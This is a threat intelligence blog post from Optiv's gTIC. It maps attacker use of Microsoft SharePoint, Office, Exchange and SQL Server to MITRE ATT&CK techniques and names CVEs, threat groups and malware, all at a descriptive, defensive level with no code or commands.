This blog post is a continuation of our Optiv Global Threat Intelligence Center’s (gTIC) Prioritized Software and Services List series. The list provides a high-level introduction to the frequently exploited software, services, and protocols and associated MITRE ATT&CK tactic mappings. The purpose of researching, identifying, and prioritizing potentially high-risk products (based off attractiveness for, and frequency of, targeting by adversaries) is to supplement and support enterprise risk management, incident response preparedness, intelligence collection, and threat research. Follow-up reports will cover more details on adversaries, vulnerabilities, techniques, and real-world incidents (where applicable) pertaining to many of the software and services outlined in the original blog post.

This fourth blog post in the series will cover exploitation trends and vulnerabilities in Microsoft SharePoint, Office, Exchange, and SQL Server to support the gTIC’s inclusion of Microsoft products on our Prioritized Software and Services List.

Microsoft Products and MITRE Technique Mapping

Optiv’s gTIC has identified and categorized Microsoft SharePoint, Office, Exchange, and SQL Server as Critical Enterprise Software. As described in our initial “Prioritized Software and Services List,” products and software that fall under the category of “Critical Enterprise Software” are considered essential to business processes and continuity. These products enable internal and external system communications; web and application servers; and file and data hosting, management, storage, and sharing. Adversaries target these types of software and products for various actions, including accessing and exfiltrating data, gaining Initial Access with malware or phishing, scanning and exploitation of insecure web-facing instances, installing backdoors and web shells to achieve Persistence, enumerating user credentials and privileges, and mapping out other parts of the network.

Microsoft software includes some of the most widely used email, networking, and document processing products and servers present in enterprise environments. The elevated risk profile for applicable organizations is based on the ubiquity of Microsoft products, as well as the severity and notoriety of known vulnerabilities and real-world compromises. While multiple Microsoft products have a strong presence in corporate environments globally, some are more frequently reported on. Independent of report frequency, if your organization owns or uses SharePoint, Office, Exchange, and SQL Server or any other popular Microsoft products, prioritize accordingly.

Reports and observations show that adversaries leverage Microsoft products to navigate across at least eight (8) Tactics mapped to the MITRE ATT&CK framework. Specific MITRE ATT&CK Techniques for each of the observed tactics include the following:

TA0001 - Initial Access

T1190 – Exploit Public Facing Application: Remote code execution (RCE) vulnerabilities in Microsoft Exchange and SharePoint have been exploited to gain Initial Access by cybercriminals as part of their attack vector. The ProxyLogon series of vulnerabilities in Microsoft Exchange were famously exploited by Chinese APT groups like HAFNIUM as well as Black Kingdom Ransomware syndicates 2020-2021. Adversaries are known to leverage open-source and public-facing hacking tools to exploit exposed and vulnerable instances of SQL Server to install backdoors for further intrusion and persistence.

T1566 – Phishing: Cybercriminals and APT groups leverage phishing emails with malicious Microsoft Office document and workbook attachments. These trojan malware files often result in the installation or download of keyloggers, credential stealers, or ransomware.

TA0002 – Execution

T1204 – User Execution: Phishing emails with malicious Microsoft Office files (e.g., Word, Excel), links to malicious Office files, or embedded malicious macros are sent to victims that require user interaction (e.g., opening the file, clicking on a hyperlink, or enabling Macro scripts). This results in the downloading of other binaries and second-stage malware. Keyloggers and commodity malware, such as Agent Tesla, Emotet and Formbook, as well as C2 malware, are often delivered in this manner. Threat actors regarded as APT groups are reported to still exploit old Office vulnerabilities via phishing emails with malicious attachments.

T1059.001 – Command and Scripting Interpreter: PowerShell: The January 2024 RE#TURGENCE cybercriminal campaign executed PowerShell encoded commands on compromised SQL servers to download and execute additional malicious files and code from remote servers.

TA0003 – Persistence

T1505.003 – Server Software Component – Web Shell: Web shells have been deployed to install and execute ransomware after exploitation of Microsoft SharePoint and Exchange server vulnerabilities to maintain Persistence. APT groups have leveraged web shells to maintain a foothold within the network to later deploy the destructive wiper malware after exploiting SharePoint vulnerabilities.

TA0006 – Credential Access

T1110 – Brute-Force: Malware campaigns are known to leverage native tools and command-line interfaces to brute-force administrator-level accounts to add a ghost/backdoor user to Microsoft SQL Servers.

TA0007 – Defense Evasion

T1562.001 – Impair Defenses – Disable or Modify Tools: Cybercriminals are known to install malware to remotely run scripts that tamper with security settings in Microsoft Office.

TA0009 – Collection

T1114.002 – Email Collection - Remote: Cybercriminals have exploited vulnerabilities in Microsoft Exchange to gather emails, which were then sold or provided to other threat actors to parse through and hijack existing threads to deliver malware in separate campaigns.

T1114.003 – Email Collection – Email Forwarding Rules: Compromised Microsoft Exchange accounts or harvested user credentials are used in email thread hijacking and business email compromised (BEC) attacks. Qakbot malware campaigns were observed to leverage existing email threads to send malware-laden emails to other internal users/victims to further achieve Lateral Movement.

T1213.002 – Data from Information Repositories - SharePoint: Reported state-sponsored APT operations suggest that Microsoft 365 administrator credentials were leveraged to change permissions and provide access to data residing in SharePoint. The LAPSUS$ group is also known to hunt through victims’ SharePoint instances for credentials.

T1056 – Input Capture: Malware has been installed to collect usernames and passwords of users logging into compromised Microsoft Exchange servers by monitoring clear text HTTP traffic and capturing the credentials from the webform data or HTTP headers. This particular procedure to achieve T1056 is not yet common and has been observed in limited instances/campaigns.

TA0010 - Exfiltration

T1567 – Exfiltration Over Web Service: Attackers have been observed communicating with their malware C2 servers using emails sent using the Microsoft Exchange Web Services (EWS) API to transfer data out as well as send commands remotely.

TA0040 - Impact

T1486 – Data Encrypted for Impact: Ransomware campaigns targeting improperly managed or vulnerable Microsoft Exchange and SQL Servers for Initial Access resulted in the destruction or encryption of system files across the network later into the attack cycle.

T1496 – Resource Hijacking: Web shells and coin miners are uploaded onto web-facing servers as a result of RCE vulnerabilities (e.g., Exchange, SharePoint).

The following chart shows the most popular and widely covered Microsoft products—Office, Exchange, SQL Server, and SharePoint—mapped to various MITRE Tactics. The chart also shows associated threats, including malware, adversaries, and popular vulnerabilities assessed to pose a high risk to organizations or that are known to be exploited by cyber adversaries over the last 24 months.

Image

Figure 1: Threat Actor Tactics Map

Vulnerabilities and Threats

Cyber adversaries are known to exploit vulnerabilities in Microsoft products to accomplish numerous objectives, including to deliver various types of payloads and implants like remote access trojans (RATs); to gain Initial Access for exploit kit activity; to install web shells, keyloggers and credential stealers, ransomware; and to establish a foothold for botnets. Research and observed incidents of compromises involving Microsoft exploits also validate Optiv gTIC’s long standing assessment that threat actors will continue to exploit old vulnerabilities (two years and older) in popular software and services due to the continued demonstrable, proven exploit success over time.

Aside from zero-day exploits, research shows that adversaries have scanned for and exploited critical vulnerabilities in Microsoft SharePoint, Office, Exchange, and SQL Server within 24 hours of disclosure. It is therefore highly time sensitive for enterprises to prioritize such Microsoft software assets in an asset inventory and defense-in-depth program. Threat actors known to have exploited Microsoft products as part of their campaigns include the APT groups, APT41 (aka: BARIUM), APT34, HAFNIUM, Sidewinder; the ransomware cartels, LockBit Ransomware, AvosLocker Ransomware, Black Kingdom Ransomware, Alphv Ransomware; and the cybercriminal and initial access brokers, FIN7 and Cobalt Group. This is Likely due to Microsoft products’ ubiquity across enterprise environments, management and access to data and accounts, and internet-facing position (i.e., Exchange)—making the critical vulnerabilities in these products a key target for Initial Access, Discovery, and Collection.

Remote Code Execution (RCE) and Local Privilege Escalation (LPE) vulnerabilities in Microsoft products are among the most critical types of vulnerabilities. These vulnerabilities allow attackers to execute code and upload arbitrary files. Adversaries can also elevate privileges to manipulate, add, or delete credentials and files, as well as gain access to sensitive directories and systems. The most popular attack vector for Initial Access remains phishing with malicious links or attachments. Some of the most popular Microsoft Office vulnerabilities from 2017 and 2018 continue to be observed in exploitation attempts as recently as 2023. These attempts include commodity malware incidents (i.e., AgentTesla, Formbook, FareIt/Pony, Emotet), as well as lower-capability, state-sponsored campaigns like those seen by the Indian APT group, Sidewinder. CVE-2017-11882 and CVE-2017-0199 are two of the most infamous and popular vulnerabilities observed in these types of malware-laden phishing attempts, but they are Likely affecting pirated copies known to be used heavily in many countries. Additionally, remote access trojans (RATs) like Revenge RAT have been observed attempting to bypass defensive measures by deprecating security settings in Office, including disabling Protect View and turning on Macros settings to allow code execution. This trend of attempting to exploit older vulnerabilities (2 years and older) in popular software is a standing gTIC assessment and will Likely to persist over the next 12 months. More recent observations of Microsoft Office exploits include the exploitation of the 2023 Follina arbitrary code execution vulnerability, CVE-2022-30190, to deliver the Lokibot commodity malware.

The advanced cybercriminal outfit attributed as FIN7 was among multiple threat groups previously reported to exploit a high-severity and popular RCE vulnerability in Microsoft SharePoint, CVE-2019-0604, to upload web shells or other malware to maintain Persistence once Initial Access (including through other non-Microsoft software exploitation) was achieved. This type of vulnerability, including those affecting Exchange, poses a much higher risk to on-premises instances than off-premises (cloud-hosted) versions.

Malware campaigns, like Maggie, have also been observed to target Microsoft SQL Server for Privilege Escalation and Persistence. The Maggie backdoor was installed onto vulnerable SQL servers, after which commands were executed using the SqlScan tool to brute-force administrator-level accounts and add ghost/backdoor user accounts to the targeted Microsoft SQL Server. The RE#TURGENCE campaign, observed and reported in January 2024 and attributed to attackers of Turkish origin, was also observed to leverage credential brute-forcing against SQL servers to gain Initial Access. Once access was achieved, the attackers executed malicious PowerShell code (via the sqlservr.exe process) to download additional malware onto compromised servers.

After gaining Initial Access via phishing with a malicious Microsoft Office file or via exploiting a vulnerable instance of Exchange or SQL servers, popular adversary actions include the deployment of destructive malware (e.g., ransomware, wiper malware) for Impact and web shells for Persistence. In 2021, ransomware outfits like Black Kingdom and Chinese APT groups like HAFNIUM exploited a set of zero-day vulnerabilities in on-premises Exchange servers, later known as the ProxyLogon vulnerabilities (most notably CVE-2021-27085), to deliver either ransomware or old, openly available web shells like China Chopper. In Spring 2023, an Iranian state-sponsored group, APT34, targeted Exchange to deliver the custom ExchangeLeech backdoor. This backdoor collected credentials of users logging into compromised Exchange servers by monitoring clear text HTTP traffic and capturing the credentials from the webform data or HTTP headers. During this campaign, APT34 also sent emails using the Exchange Web Services API to communicate with a malware command and control (C2) server for both the Exfiltration of data and remote command delivery.

Cybercriminals have also exploited Microsoft Exchange vulnerabilities to harvest emails and credentials. They can then sell most of these stolen email files to other criminals to parse through before leveraging them for email thread hijack attacks. They execute these attacks by sending spoofed emails to recipients in existing threads to achieve Lateral Movement. Cybercriminals spread the Qakbot backdoor across networks in this manner.

While not the focus of this blog post, Optiv’s gTIC also recognizes other Microsoft products that threat actors are Likely to exploit. While we will cover browser products like Microsoft Edge and Internet Explorer in a separate report, it is evident that off-premises cloud and code repositories like Microsoft Azure and GitHub are becoming more popular as attack vectors for cyber adversaries.

The graphics below illustrate Optiv gTIC’s Threat Actor Metric™ calculated for selected cyber threat actors known to leverage Microsoft SharePoint, Office, Exchange, or SQL Server as part of their attacks (See Appendix: References for an explanation of the Threat Actor Metric^™).

Image

Figure 2: Threat Actor Metric Score for Alphv Ransomware
© 2023. Optiv Security Inc. All Rights Reserved.

Image

Figure 3: Threat Actor Metric for FIN7
© 2023. Optiv Security Inc. All Rights Reserved.

Image

Figure 4: Threat Actor Metric for APT34
© 2023. Optiv Security Inc. All Rights Reserved.

Image

Figure 5: Threat Actor Metric for Hafnium
© 2023. Optiv Security Inc. All Rights Reserved.

Appendix

References
¹MITRE ATT&CK^® is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community. More information about MITRE ATT&CK^® can be found at attack.mitre.org. All information about MITRE ATT&CK belongs to The MITRE Corporation subject to the following copyright: ^© 2021 The MITRE Corporation. MITRE ATT&CK^® is licensed under the Terms of Use located at https://attack.mitre.org/resources/terms-of-use/".

Optiv Threat Actor Metric^™ – The Optiv Threat Actor Metric^™ was developed by Optiv’s gTIC and is a multi-faceted, qualitative approach to determine a cyber adversary’s or campaign’s potential threat to an organization or industry. The metric considers known and assessed non-technical capabilities and intentions and is scored out of a total possible of 100. The purpose of this metric is to provide an added layer of depth to risk-based intelligence analysis and support proactive and remediating recommendations by presenting a visualization of non-technical, qualitative risk factors of adversaries and threat campaigns. It is similar in function as to the United States Department of Defense’s CARVER targeting scale.

Link charts and graphs in this report were created by Optiv gTIC leveraging the ThreatQuotient^® Investigations platform.

In addition to Optiv’s own Enterprise Incident Management team’s incident response engagements and analysis and other sensitive sources, the following references provided additional information for this blog post:

AT&T Cybersecurity, ‘Sharepoint vulnerability exploited in the wild’, 2020, https://cybersecurity.att.com/blogs/labs-research/sharepoint-vulnerability-exploited-in-the-wild/

DCSO CyTec, ‘MSSQL, meet Maggie’, 2022, https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01 Fortinet, ‘JuicyPotato Hacking Tool Discovered on Compromised Web Servers’, 2021, https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/report-juicypotato-hacking-tool-discovered.pdf

Fortinet, ‘LokiBot Campaign Targets Microsoft Office Document Using Vulnerabilities and Macros’, 2023, https://www.fortinet.com/blog/threat-research/lokibot-targets-microsoft-office-document-using-vulnerabilities-and-macros

Gatlan, Sergiu, ‘New PowerExchange malware backdoors Microsoft Exchange servers’, 2023, https://www.bleepingcomputer.com/news/security/new-powerexchange-malware-backdoors-microsoft-exchange-servers/

NSFocus, ‘Microsoft SQL Server Remote Code Execution Vulnerability (CVE-2020-0618) Threat Alert’, 2020, ‘https://nsfocusglobal.com/microsoft-sql-server-remote-code-execution-vulnerability-cve-2020-0618-threat-alert/’

O’Donnell-Welch, Lindsey, ‘Qakbot attack uses email threads hijacked from ProxyLogon compromises’, 2022, https://duo.com/decipher/qakbot-attack-uses-email-threads-hijacked-from-proxylogon-compromises

U.S. CISA, ‘Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology’, 2022, https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-047a

Zurier, Steve, ‘Microsoft SharePoint vulnerability and China Chopper web shell used in ransomware attacks’, 2021, https://www.scmagazine.com/news/malware/microsoft-sharepoint-vulnerability-and-china-chopper-web-shell-used-in-ransomware-attacks

Analytical Comments, Statements, and Best Practices

Most Likely Course of Action (MLCOA) – The expected and probable tactics, techniques, and actions carried out by a threat actor. COA statements are well established and accepted in estimative and predictive intelligence assessments.

Most Dangerous Course of Action (MDCOA) – Tactics, techniques, or actions carried out or taken by an adversary that result in a worst-case scenario outcome or impact, regardless of probability. COA statements are well established and accepted in estimative and predictive intelligence assessments.

Words of Estimated Probability – Optiv’s gTIC employs the use of both probability statements for likelihood of events or actions and confidence levels for analytic assessments and judgements. Probability statements and confidence statements are inherently subjective; however, the gTIC leverages professional experience and intelligence fundamentals to deliver reasonable and relevant statements and assessments. Probability statements and the degree of likelihood of an assessed event/incident are modeled after the Intelligence Community Directive (ICD) 203: Analytic Standards, published by the United States’ Office of the Director of National Intelligence (ODNI), and are as follows:

Confidence statements, as defined by the gTIC, apply to reliability and relevance of information reported and are as follows:

Per ICD 203 standards, confidence-level statements are not combined with probability and degree of likelihood terms proposed in the above chart.